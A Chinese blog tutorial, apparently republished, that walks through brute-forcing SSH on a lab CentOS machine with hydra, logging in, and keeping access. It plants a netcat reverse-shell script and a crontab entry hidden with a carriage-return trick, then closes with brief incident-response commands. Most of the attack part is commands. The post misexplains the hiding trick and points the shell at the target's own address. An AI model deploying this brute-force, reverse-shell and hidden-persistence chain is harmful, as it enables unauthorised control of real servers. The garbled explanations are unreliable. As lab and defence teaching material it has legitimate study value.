SSH爆破攻击及应急响应/事件处置

移动开发 2023-06-05 18:42:04 阅读次数: 0

提示:本文是我做的笔记,有问题可以留言

目录

前言

提示:这里可以添加本文要记录的大概内容:

随着互联网的不断发展,网络安全越来越得到重视了…实在是编不下去了,就是想随便写一个开头,就没了。

提示:以下是本篇文章正文内容,下面案例可供参考

一、什么是SSH?

ssh(安全外壳协议)(secure shell),是一种加密的网络传输协议,可以在不安全的网络环境中提供安全的传输环境,ssh通过在网络中创建安全隧道来实现ssh客户端与服务端之间的连接,ssh最常见的用途是远程登陆系统,ssh使用率最高的场合是unix系统

二、开始前的准备

攻击机:2023.1?
在这里插入图片描述

目标机:cent os7
在这里插入图片描述

1.扫描

让我们扫描,192.168.0.147,ip地址
在这里插入图片描述
我们发现他开放22,80端口,我么先不管80端口就先攻击一下22端口。

2.准备爆破

在这里插入图片描述

hydra -L /home/kali/Desktop/user.txt -P /home/kali/Desktop/pas.txt -f -vV ssh://192.168.0.147

-L file 大写,指定用户的用户名字典
-P file 大写,用于指定密码字典。
-v / -V 显示详细过程
-f 找到第一对登录名或者密码的时候中止破解。
我们创建两个简单的字典文件
在这里插入图片描述
在这里插入图片描述
准备好字典后按下回车
在这里插入图片描述
出来了用户名是Neatsuki,密码是2468admin,当然我是不会设置这么简单的密码的,本文章完成后我会换密码的,

3.准备ssh登录

ssh Neatsuki@192.168.0.147

Neatsuki是你爆破出来的用户名,@是登陆在,192.168.0.147是你要登陆的IP/主机
在这里插入图片描述
这里要输入yes,不然登陆不进去
在这里插入图片描述
输入爆破出来的密码
在这里插入图片描述
成功登录,
在这里插入图片描述
提示符一样,这代表我们成功了

登陆后的准备

我们经历了千辛万苦,百般阻挠,终于登陆了cent os系统,但是他一旦关机或换密码,我们的努力就都白费了,所以我们要建一个跟后门差不多的东西,来权限维持。
输入vim san.sh
san你可以换掉名字随便取

#!/bin/bash
nc 192.168.0.147 7777 -e /bin/bash

这个就是nc反弹,是一个Bash脚本,它使用nc命令(也称为netcat)来连接到IP地址为192.168.0.147的计算机的7777端口。一旦连接成功,它将打开一个交互式的Bash shell,允许用户在远程计算机上执行任意命令。这个脚本的作用类似于一个远程控制工具,可以被恶意攻击者用来入侵和控制远程计算机。
让我们,来看一下它的权限

ls -l san.sh

在这里插入图片描述

现在是可读可写状态所以,我们要给予他神圣的权力(权限)

chmod +x san.sh

输入完这条命令,就会发现还和以前一样,不不不,在输入这条指令,我们要查看它的权力(权限)

ls -l san.sh

在这里插入图片描述
可以看到,多了一个字母X,我们已经授予它可执行的权限了。
然后,一个大臣还不够在招一个一个大臣
输入

vim aaa.sh

跟那个一样名字随便写

(crontab -l;printf "* * * * * /tmp/san.sh;\rno crontw-wab for 'whoami'%100c\n")|crontab -

另外一个大臣的作用:将一个名为san.sh的脚本文件添加到当前用户的crontab中,并在每分钟执行一次该脚本文件。同时,它会在添加完crontab后输出一段文本,提示当前用户没有crontab的写入权限。

具体来说,这条命令使用了管道符(|)将两个命令串联在一起。第一个命令是crontab -l,它会列出当前用户的crontab内容。第二个命令使用printf函数向标准输出流中输出一段文本,其中包含了一个将光标向右移动100个字符的转义序列(%100c)。这个转义序列的作用是让输出的文本在终端中居中显示。

最后,管道符将第一个命令的输出作为第二个命令的输入,将文本输出到终端中。
我们也要给他权限,

chmod +x aaa.sh

nc反弹

nc -lvp 7777

作用:这是一个用于监听网络连接的命令,具体含义如下:

  • nc:是一个网络工具,用于在网络上进行数据传输和调试。
  • -l:表示监听模式,即等待其他计算机连接。
  • -v:表示启用详细模式,输出更多的信息。
  • -p:表示指定端口号。
  • 7777:表示监听的端口号。

因此,运行该命令后,计算机会开始监听 7777 端口,等待其他计算机连接。如果有其他计算机连接到该端口,该命令会将连接的数据输出到终端上。

应急响应/事件处置

啊,这是蓝队应该看的,你们看啥,适可而止啊

1.查看网络连接情况

netstat -antpl

在这里插入图片描述
发现异常连接

2.查看守护进程

查看进程树:

pstree -p

在这里插入图片描述
查看进程:

systemctl status 3076

在这里插入图片描述
存在异常连接

3.删除,结束异常后门

删除恶意文件

crontab -r -u root

杀掉进程

kill 28377

删除文件

rm aaa.sh
rm san.sh

4.修改密码

passwd 密码

总结

本文就是很简单地讲解了ssh爆破和防御,

THE END

猜你喜欢

转载自blog.csdn.net/m0_54471074/article/details/130439300
今日推荐
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
美国拟限制 AI 大模型出口中国和俄罗斯
苹果将与 OpenAI 达成协议,将 ChatGPT 应用于 iPhone
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
报告:Django 仍然是 74% 开发者的首选
《2024 年一季度互联网投融资运行情况》研究报告
15 年前上了“FFmpeg 耻辱柱”,今天他还得谢谢咱——腾讯QQPlayer一雪前耻?
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
周排行
BPM为企业带来的实际利益
好程序员web前端分享css常用属性缩写
Java文件下载(excel)
css样式的动态添加及显示和隐藏等零碎用法
axios全局配置以及拦截器
使用Logstash来实时同步MySQL和log日志数据到ES
C++获取当前时间(年月日、时分秒、毫秒)
Odoo产品分析 (四) -- 工具板块(11) -- 网站即时聊天(1)
Java环境配置正确,但是java、javac、java -version均返回“不是内部或外部命令,也不是可运行的程序或批处理文件”?
01 官网下载各种CentOS教程(超详细版)
每日归档
更多
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022